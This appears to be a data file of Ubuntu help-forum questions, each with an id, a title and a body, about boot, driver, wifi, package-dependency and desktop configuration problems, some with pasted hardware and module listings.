427629	problem starting up from win 7 boot disk on ubuntu 13.10	i am a noob ubuntu user . over the past few months of using ubuntu 13.10 on my laptop , i have reached a breaking point with myriad incompatibilities and no longer wish to use it . i am not running a dual-boot windows/ubuntu , purely ubuntu . my goal is to reformat my drive using a windows 7 boot disk and reinstall windows 7 . the problem i am running into is that even though i select start-up from my dvd drive in bios , the start-up goes straight to ubuntu instead . in the grub there is no option to boot from the disk when it is in the drive . is there an alternative method to replacing ubuntu with windows 7 ?
427630	ubuntu 12.04 , why so laggy ?	i installed only ubuntu 12.04 on an old dell inspiron 9400 laptop and it ran great ... for about a month . now it seems to force its way through the mainstream tasks . it may be an old laptop but i could use around 5 browser tabs with no problems , no matter which browser i used . it just seems to freeze quite often . when i close everything , there does n't appear to be much activity ( only the system monitor open , but everything is normal ) . i tried the free -m command and this is what it outputs total used free shared buffers cached mem : 1001 745 255 0 24 366 -/+ buffers/cache : 355 646 swap : 1020 1 1019 any idea why it slows down so much and what should be done , besides trying a fresh install ? -- update -- list of hardware description : portable computer product : mp061 ( ) vendor : winbond electronics serial : 5t78l2j width : 32 bits configuration : boot=normal chassis=portable uuid=44454c4c-5400-1037-8038-b5c04f4c324a *-core description : motherboard product : 0yd479 vendor : winbond electronics physical id : 0 serial : .5t78l2j.cn129616ad3842 . *-firmware description : bios vendor : winbond electronics physical id : 0 version : a04 date : 09/29/2006 size : 64kib capacity : 512kib capabilities : isa pci pcmcia pnp upgrade shadowing cdboot bootselect int13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb agp smartbattery biosbootspecification netboot *-cpu description : cpu product : intel ( r ) core ( tm ) 2 cpu t5600 @ 1.83ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 version : 6.15.6 serial : 0000-06f6-0000-0000-0000-0000 slot : microprocessor size : 1333mhz capacity : 2130mhz width : 64 bits clock : 166mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm tpr_shadow cpufreq configuration : cores=2 enabledcores=2 id=0 threads=2 *-cache:0 description : l1 cache physical id : 700 size : 32kib capacity : 32kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 701 size : 2mib capacity : 2mib clock : 66mhz ( 15.0ns ) capabilities : pipeline-burst internal varies unified *-logicalcpu:0 description : logical cpu physical id : 0.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 width : 64 bits capabilities : logical *-memory description : system memory physical id : 1000 slot : system board or motherboard size : 1gib *-bank:0 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) product : nt512t64uh8b0fn-37 vendor : nanya technology physical id : 0 serial : 96223a31 slot : dimm_a size : 512mib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:1 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) product : nt512t64uh8b0fn-37 vendor : nanya technology physical id : 1 serial : 1de87810 slot : dimm_b size : 512mib width : 64 bits clock : 533mhz ( 1.9ns ) *-pci description : host bridge product : mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 03 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : efd00000-efefffff ioport : d0000000 ( size=268435456 ) *-display description : vga compatible controller product : rv515/m54 [ mobility radeon x1400 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:16 memory : d0000000-dfffffff ioport : ee00 ( size=256 ) memory : efdf0000-efdfffff memory : efe00000-efe1ffff *-multimedia description : audio device product : nm10/ich7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : efffc000-efffffff *-pci:1 description : pci bridge product : nm10/ich7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 01 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:2000 ( size=4096 ) memory:40000000-401fffff ioport:40200000 ( size=2097152 ) *-pci:2 description : pci bridge product : nm10/ich7 family pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 01 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport:3000 ( size=4096 ) memory : efc00000-efcfffff ioport:40400000 ( size=2097152 ) *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : wlan0 version : 02 serial : 00:18 : de : a5:73:66 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.8.0-36-generic firmware=15.32.2.9 ip=192.168.192.40 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : efcff000-efcfffff *-pci:3 description : pci bridge product : nm10/ich7 family pci express port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : 01 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:43 ioport : d000 ( size=4096 ) memory : efa00000-efbfffff ioport : e0000000 ( size=2097152 ) *-usb:0 description : usb controller product : nm10/ich7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:20 ioport : bf80 ( size=32 ) *-usb:1 description : usb controller product : nm10/ich7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport : bf60 ( size=32 ) *-usb:2 description : usb controller product : nm10/ich7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:22 ioport : bf40 ( size=32 ) *-usb:3 description : usb controller product : nm10/ich7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : bf20 ( size=32 ) *-usb:4 description : usb controller product : nm10/ich7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 01 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:20 memory : ffa80000-ffa803ff *-pci:4 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e1 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : memory : ef900000-ef9fffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:15 : c5:55:78 : a8 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : ef9fe000-ef9fffff *-firewire description : firewire ( ieee 1394 ) product : r5c832 ieee 1394 controller vendor : ricoh co ltd physical id : 1 bus info : pci @ 0000:03:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : driver=firewire_ohci latency=64 maxlatency=4 mingnt=2 resources : irq:19 memory : ef9fd800-ef9fdfff *-generic:0 description : sd host controller product : r5c822 sd/sdio/mmc/ms/mspro host adapter vendor : ricoh co ltd physical id : 1.1 bus info : pci @ 0000:03:01.1 version : 19 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=sdhci-pci latency=64 resources : irq:18 memory : ef9fd500-ef9fd5ff *-generic:1 description : system peripheral product : r5c592 memory stick bus host adapter vendor : ricoh co ltd physical id : 1.2 bus info : pci @ 0000:03:01.2 version : 0a width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : driver=r592 latency=0 resources : irq:18 memory : ef9fd600-ef9fd6ff *-generic:2 description : system peripheral product : xd-picture card controller vendor : ricoh co ltd physical id : 1.3 bus info : pci @ 0000:03:01.3 version : 05 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : driver=r852 latency=0 resources : irq:18 memory : ef9fd700-ef9fd7ff *-isa description : isa bridge product : 82801gbm ( ich7-m ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 01 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-ide description : ide interface product : 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 01 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:17 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : bfa0 ( size=16 ) *-serial unclaimed description : smbus product : nm10/ich7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 01 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport:10c0 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : toshiba mk1234gs vendor : toshiba physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : ah00 serial : x6ltt9p8t size : 111gib ( 120gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=0002ef81 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 0714fe2d-ac7a-4346-9215-28a3f34d140d size : 29gib capacity : 29gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-11-10 22:07:53 filesystem=ext4 lastmountpoint=/ modified=2013-11-22 14:36:32 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-02-28 17:41:20 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 1021mib capacity : 1021mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 1021mib capabilities : nofs *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 09b8-b67c size : 81gib capacity : 81gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2013-11-19 18:09:11 filesystem=ntfs state=clean *-scsi:1 physical id : 2 logical name : scsi1 capabilities : emulated *-cdrom description : dvd writer product : dvd+-rw nd-6650a vendor : _nec physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 102c serial : [ capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=nodisc *-battery product : dell 00 vendor : gwďż˝ physical id : 1 slot : sys . battery bay capacity : 66000mwh configuration : voltage=11.1v
427636	ubuntu 13.10 chrashed	i installed ubuntu 13.10 , and i take 2 days fixing a lot of problems with the monitor interfaces . every time ubuntu crashed ( blocked screen ) with the typical error : noveau e [ xorg [ 966 ] ] failed ... .. or others . i am not expert in linux ( dummy user ) , so , is there any iso installation image that work properly with my pc , compaq presario cq5000 series , amd athlon ( tm ) ii x3 435 processor , platform x86_64 , nvidia geforce 6150se nforc , memory 2 gb ram ? or must go to a previous more stable distribution ? thanks
427637	can not connect to broadcom bc	i have the exact same problem as this question . i have a lenovo b590 , but the same wireless adapter . i am running lubuntu 12.04 . things i have done : the wireless was crap out of the box . updated the proprietary driver and everything seemed to be working really well ( strong connection strength and everything ! ) until i used a secured network . then it just could n't connect ( it would try to , but after 3 minutes of trying it would fail ) . windows ( dual booted computer ) had no problem connecting . followed everything the linked post above says to do . it connects ! ( it did with just the install of apt-get install linux-firmware-nonfree doing the rest of what he says has no change in the connection strength . anyone know a way to make the connection strength better ? lshw sudo lshw ... ** *-network description : network controller product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : f0500000-f0503fff *-pci:2 ... iwconfig sudo user @ user-lenovo-b590 : ~ $ sudo iwconfig [ sudo ] password for user : lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' denhac '' mode : managed frequency:2.437 ghz access point : 06:27:22 : ff:2b:6f bit rate=57.8 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=40/70 signal level=-70 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:7 invalid misc:19 missed beacon:0 eth0 no wireless extensions . lsmod user @ user-lenovo-b590 : ~ $ sudo lsmod module size used by dm_crypt 23125 1 arc4 12529 2 brcmsmac 526018 0 bnep 18281 2 rfcomm 47604 12 parport_pc 32866 0 ppdev 17113 0 joydev 17693 0 snd_hda_codec_hdmi 32530 1 snd_hda_codec_realtek 224173 1 mac80211 557795 1 brcmsmac bcma 45794 2 brcmsmac brcmutil 15618 1 brcmsmac acer_wmi 28418 0 sparse_keymap 13890 1 acer_wmi btusb 18332 2 bluetooth 180113 23 bnep , rfcomm , btusb cfg80211 553813 2 brcmsmac , mac80211 thinkpad_acpi 81819 0 snd_hda_intel 33719 1 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel nvram 14413 1 thinkpad_acpi snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 lib80211 14381 0 snd_rawmidi 30748 1 snd_seq_midi cordic 12574 1 brcmsmac compat 39601 5 brcmsmac , mac80211 , bcma , cfg80211 , lib80211 snd_seq_midi_event 14899 1 snd_seq_midi uvcvideo 72627 0 psmouse 97519 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev serio_raw 13211 0 snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq mac_hid 13253 0 snd 79041 13 snd_hda_codec_hdmi , snd_hda_codec_realtek , thinkpad_acpi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mei 41616 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usb_storage 49198 0 usbhid 47238 0 hid 99883 1 usbhid wmi 19256 1 acer_wmi i915 478556 2 r8169 62190 0 drm_kms_helper 46978 1 i915 drm 241971 3 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 video 19651 1 i915
427638	installing from usb	i have done all the steps for making a bootable usb , changed the priority of usb to first , but after rebooting it loads windows . it does n't see the usb . this is using usb 2.0 media . what could be the problem ?
427643	problems installing ubuntu 13.10 on hp pavilion touchsmart 14-n019nr laptop	i wanted to share my experiences with installing ubuntu 13.10 on the 14-n019nr laptop . i did the straightforward thing first . i created a dvd from the ubuntu iso and tried to boot the laptop to install . did n't work . i then pressed f10 while booting to go into the bios . i moved the cd/dvd up the priority list in the boot order . did n't work . i went into bios and disabled secure boot . did n't work . hmm . finally , as i was staring at a black screen with nothing on it i decided to see if turning up the screen brightness would help . voila ! ! the ubutu install screen was just sitting there in the darkness . for any others out there - try turning up the display brightness : ) cheers .
427644	how does one fsck a nas/nfs with an ext2 filesystem using ubuntu	copying a file while this hard drive is in my d-link dns-323 nas/nfs freezes and stops at around 50 % . running the dns-323 's internal scandisk fails . this inspired me to buy an external hard drive kit , usb 3.0 for an sata drive and hook it up to my ubuntu system for fixing . we ca n't fsck a mounted drive successfully and ubuntu puts the auto-found drive into /media/whatever_name instead of under /dev . unmounting the drive does not allow fsck to continue or 'find ' the now unmounted /media/whatever_name file system that was just there , so fsck aborts . how can i fix this ext2 drive , either as a nas drive or as a usb expandable drive ? help either way would be awesome . thanks in advance !
427645	how to map my ipv4 address to external address in iptables	i want to run a minecraft server ( port 25565 ) and have it send to my external address for others to play , then to my hostname ( i am assuming this is automatic - do i need a rule for this too ? ) . but i need to map my ipv4 address ( or port 25565 ) to my external address . i have opened the ports on my router config , so this is all i need . thanks !
427646	ca n't log in to ubuntu 12.04 `` checking battery '' flashes up then goes back to login screen	i am unable to log into my desktop even though i am using the correct password . when i type it in and hit enter the screen goes black and was saying something like `` checking battery '' . i have searched this problem but either i am misunderstanding some of the terminology or it does n't work . some threads i have read suggest that lighdm is the problem . i undestand lightdm relates some way to the desktop ? i have logged in via the terminal by pressing ctrl+alt+f1 but am a bit stuck on what to do from here . i am a relatively new user to ubuntu and so i am afraid my knowledge of the terminal is poor . i am not sure what i have done for this error to occur . i was enjoying using ubuntu instead of windows but this has rather soured the experience . any help would be much appreciated . rich i tried startx using ctrl+alt+f1 and the following happened : xauth : error in locking authority file /home/richard/.xauthority xauth : error in locking authority file /home/richard/.xauthority fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the x.org foundation support at http : //wiki.x.org for help ddxsiggiveup : closing log no protocol specified no protocol specified xlinit : giving up xlinit : unable to connect to x server : resource temporarily unavailable xlimit : server error xauth : error in locking authority file /home/richard/.xauthority i have had a gander at this website http : //wiki.x.org but i do n't really understand its relation to me trying to login . apologies if i 'm being dull .
427647	strange folder in my home folder after a failed run of bleachbit	a folder was created in my home folder ( not by anyone ) , and i can not see the folder contents . she has root privileges , but when the nautilus root access the folder is empty . when i try to remove it , it will appear to remove more than 1 million files from my computer , and i do not know what these files are . how i can see these files ? the name of folder created is `` 4f8zbreshq '' . i 'm scared about it ...
427651	installed ubuntu 13.10 in hyper-v and speech dispacher error now ubuntu one not logging in	i wanted to set up a new web server and decided to try ubuntu . i set up a new hyper-v vm and installed but then on reboot i received the following error : speech-dispatcher disabled ; edit /etc/default/speech-dispatcher i powered off and back on and it booted successfully but now i ca n't connect to ubuntu one . i am entering the correct details but it just gives this error : host requires authentication if i enter a different password it says it is incorrect and i can log in online so i know it is correct . it does add the computer in the my account section online every time i try it . does anyone know how to fix this issue and could it have anything to do with the first error i received ? thanks robin
427652	no size adjustment for launcher bar in 12.0.4.4 lts	ever since the upgrade to 12.04.4 lts , my launcher bar icons are huge . i no longer have the slide bar to adjust them . is there a place to re-enable that feature ?
427653	broadcom sta wireless driver wo n't install	i am running ubuntu 12.04 and windows vista on my acer extensa 4620z . wi-fi works fine in vista . when i try and install the broadcom sta wireless driver in ubuntu it says : sorry , installation of the driver failed . please have a look at the log file for details : /var/log/jockey.log . when i connected to the internet via ethernet cable and tried to install the driver the same thing happened . i am new to ubuntu and any help would be appreciated . in jockey.log it says warning : /sys/module/wl/drivers does not exist , can not rebind wl driver debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blackliste
427658	unnecessary packages on my ubuntu vps server from host . how to diff with standard ubuntu ?	the ubuntu setup & packages that i got on my vps from my host provider seems to be quite different from default ubuntu server minimal edition . for e.g . i could see some not so necessary packages like samba , procmail , sound-theme-freedesktop , bluez & many others , have been installed by default ! ? well in a minimal server installation , does they make sense ! ? is there any way i could compare the ubuntu i got from the host with the standard offical ubuntu ? some way could i diff my setup with the standard ubuntu ?
427660	problems with video graphics in games	sorry for the not accurate title , but it is easier to see this image rather then explain : i get this strange view for most of the games . i really do n't know what is the source for the error , i get it also on : left4dead2 and dota2 . maybe opengl ? thanks for help and all the answers . result from lspci -nnk | grep -ia2 vga : 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk107 [ geforce gt 630 oem ] [ 10de:0fc2 ] ( rev a1 ) subsystem : asustek computer inc. device [ 1043:83e2 ] kernel driver in use : nouveau
427663	is bluefish text editor compatible for xfce ( gkt2 ) ?	i like bluefish text editor but want to make sure it does n't have a huge set of libraries that will swamp my small computer . i 'm using xubuntu 13.10 .
427669	file-manager and ffmpegthumbnailer	i have pcmanfm installed on xubuntu along with ffmpegthumbnailer . everything works fine except for some configurations like video border , some file formats like flv and so on . how could i change those settings that the file-manager uses to access ffmpegthumbnailer . is it located somewhere in the usr/share directories ?
427670	wacom axis sensitivity	my wacom stretchs everything vertically . how do i lower its vertical sensitivity ? i use my display rotated to see it vertically . may be it is confusing the tablet . ( but i switched off absolute positioning in system prefs . ) intuous pen small is really not big , so i want to use it in its ordinary position , though may be rotating of it could solve particular problem . but i need it to be as wide as it is . please , help with configuring .
427671	will `` regular '' ubuntu run well on a dell inspiron 15r ?	i am going to be installing linux , ubuntu on a laptop this evening with the following basic specs : core i3 processor 4gb ram 500gb hdd intel hd 3000 graphics would the basic , normal , most recent and up-to-date ubuntu version run well on this setup ? i 'm going to be replacing windows 8 with ubuntu , from a usb drive , and i wish to do this with a minimal amount of headache . also , any tips/tricks to make this go more smoothly ?
427673	is 13.10 the latest version of xubuntu ?	and when does the next version of it come out ? and will i get a notice of all future versions and the ability to upgrade ?
427675	lubuntu panel showing multiple icons of apps	my lubuntu panel is showing multiple icons of apps . it all started out with two network icons - not something major . i did an update and after reboot started transmission which showed four icons on the panel . i googled and found some tips on how to deal with multiple network icons but after reload , they multiplied - four transmission icons and five network icons . any idea on how to fix this ?
427677	display port monitor not being detected	i am using ubuntu 12.04 with 3.0.11-15 generic kernel . i am trying to use a mimo usb touchscreen monitor . when i run xrandr -q i it does n't show up as a display . it does n't show up in the display menu . how do i get it to appear ? it does work during shutdown , which is weird ... ..
427680	username displays incorrectly in guis , correct in terminal	my username , which was set for me by university it , is spelled correctly in the system , shows up correctly in terminal , in my home folder , etc . however , in all the gui menus and login screen , it appears to be spelled with an `` l '' instead of a `` y '' . the letter `` y '' renders correctly elsewhere . any reason this might occur ? any ideas on how to fix it ? not a serious problem , just irksome to look at .
427681	how to install wine !	i tried to install wine through the terminal , and at some point , the eula showed up but i ca n't click anything . how do i go on ?
427682	can not boot into ubuntu after repartitioning	having successfully dual-booted my system , i decided to attempt to triple-boot kali-linux ( legacy ) , windows 8 ( uefi ) , and ubuntu 13.10 ( uefi ) . i freed up some disk space ( 5 gb if i remember correctly ) and installed kali linux . amazingly , it worked like a charm , and grub enabled me to boot into both a uefi and a legacy sistem from the same menu . but then there was a problem . as i had partitioned such a small hard disk space ( 5gb ) for kali , naturally i filled up my kali partition within a week . disappointed in my stupid decision , i booted into windows and shrunk my ubuntu partition by 25 gigs , then shifted my ubuntu partition and my swap partition to the right so that my kali partition could be expanded ( my partition setup can be seen in the following image ) . after expanding my kali partition , i rebooted my system and could not boot into ubuntu ( grub was still intact ) . in response , i created a boot-repair disk , and then reinstalled grub . unfortunately , after rebooting my system again , my caps lock blinked and i was confronted with the following error screen . any help would be appreciated . i am also curious as too what caused this issue , as it did not affect ( to my knowledge ) grub ( i could still boot into kali linux ) or the contents of the partition with ubuntu on it ( i could still open and read my files ) .
427691	two windows - mono	i want to open 2 projects of mono at the same time ( working at the same time too ) , but when i open mono , the first window will always be opened . what can i do ?
427695	weak wi-fi signal ?	i have a new lenovo ideapad y510p laptop with ubuntu 12.04 lts installed . my wifi seems to have a weak connection most of the time , and after a few minutes it will not be able to access the network at all ( it is still connected , though ) . disconnecting and reconnecting to the network will usually get it to work , but sometimes it takes forever to reconnect . windows connects just fine , and plugging in the cable works as well , so it 's not a network or hardware issue . my first thought would ge to update the driver , but i would n't know how to go about doing that or checking what i have installed ( other than checking the additional drivers in settings ) . when i check the `` additional drivers '' portion of the settings , i only see drivers for the graphics card , but i would like to know if theres any better way to check and install the driver . according to lenovo 's website it has an intel 7260 card . any advice ? typing -nn | grep 0280 info the terminal gives me 08:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 )
427699	launch logoff screen using terminal on lubuntu 13.10	how can i open the logoff screen from my terminal instead of clicking the logoff button ? this is on lubuntu 13.10 . screenshot of the logoff screen : http : //i.stack.imgur.com/jbton.png
427703	how to remove ubuntu 12.04 lts	this is a pc with no prior os , i slapped ubuntu on temporarily . i do prefer ubuntu but it 's ( unfortunately ) just not well optimised for games ; _ ; anyway i 'm pretty computer illiterate when it comes to partitioning , oses and bioses so if anyone can tell me how to remove ubuntu easily and leave my pc like it was when it was put together with no os . thanks !
427704	how can i edit the source of html in the clipboard ?	if i cut some html from a pidgin instant messenger window , i can easily paste it verbatim into a new html email in thunderbird . all formatting ( fonts , colors , etc ) are preserved , so it appears that my ubuntu 13.10 desktop clipboard must have the html source somewhere . but i 'd like to tweak the html source . how can i actually get at the html source when it is in the clipboard ? i 'd like to just throw it into a text file , work on the markup in vim or whatever , then use this html source in a webpage or feed it to thunderbird 's `` insert â html '' . hmm , maybe something like pasteimg ( mentioned in getting a graphic on the clipboard to the disk ? ) , but using request_rich_text ( ) instead of request_image ( ) ? i would n't mind using a small python script the rare times i want to get html source from the clipboard . what 's in the clipboard may actually be `` rich text '' . the python script from this answer outputs current clipboard offers formats : ( 'timestamp ' , 'targets ' , 'multiple ' , 'save_targets ' , 'compound_text ' , 'string ' , 'text ' , 'utf8_string ' , 'text/html ' , 'text/plain ' ) turns out my pidgin logs are in html , so that 's one way to get at this html source , bypassing the clipboard entirely . i 'm still interested in the answer to the original question ( how to retrieve html from the clipboard ) .
427708	matplotlib error : no module named matplotlib even though it is installed	i have been through the process of installing matplotlib on my ubuntu 12.04 computer . however , when i try to run a test program , i get the error traceback ( most recent call last ) : file `` ../py33/test.py '' , line 2 , in import matplotlib.pyplot as plt importerror : no module named 'matplotlib' i am trying a sample program from matplotlib 's website ( basic_example ) . i just do n't understand why it says there is not module matplotlib , even though i have definitely installed it ( using sudo apt-get install python-matplotlib , and have done sudo apt-get build-dep python-matplotlib ; i also tried pip install matplotlib , as i was told to do that , after installing python itself , if i wanted to install other binaries ) .
427709	teamviewer on ubuntu 13.10 dependency install problem	this is my first time using this forum and i am relatively new to ubuntu . i installed teamviewer on another machine running 12.04 no problem . i have the same errors as the op in this post : 'teamviewer depends on ( ... ) ' while trying to install teamviewer i followed the instructions given , but was left with the following error : julian @ antec300 : ~ $ sudo apt-get install -- fix-missing [ sudo ] password for julian : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : teamviewer : depends : libc6-i386 ( > = 2.4 ) but it is not installed depends : lib32asound2 but it is not installable depends : lib32z1 but it is not installed depends : ia32-libs but it is not installable e : unmet dependencies . try using -f. i have done the following : sudo apt-get -f install and then sudo apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs for which i get the following error : sudo apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 package lib32asound2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lib32asound2 ' has no installation candidate e : package 'ia32-libs ' has no installation candidate also tried installing the .deb with sudo dpkg -i teamviewer_linux_x64.deb dpkg -- add-architecture i386 apt-get update any thoughts most welcome
427710	i have a password problem can some one help	i am a new ubuntu user with 12.04 lts and stepped away from my computer for a month and forgot my password . using this forum i attempted to reset my password using a root line upon booting in grub , i followed instructions to find i was getting results that no one else had gotten . asking for reset options that i did n't understand how to use , it said the the argument was invalid , so i found a way to delete my encrypted password in a nano list . i was able to log in but sudo still seems to recognize a password and even thought my user account profile says `` none '' after password i ca n't seem to do anything . i do n't know what else to do , hopefully it can be fixed . the long explanation was to show my inexperience and give light to any mistakes made . thank you
427711	can i make a window always stay in the background ?	i 'm using xpad for sticky notes , but i do n't really like , that they appear on only one workspace by default , so i set it to show up on all . but with this setting , when i click a note , it comes above all the windows in all the workspaces . i thought it would be perfect , if i could make xpad keep in the background like conky . is this achievable ? i do n't mind , if i have to set it manually every time i start xpad . answers specific to xpad are welcome , but i 'd be happier for a general solution that would work with any application .
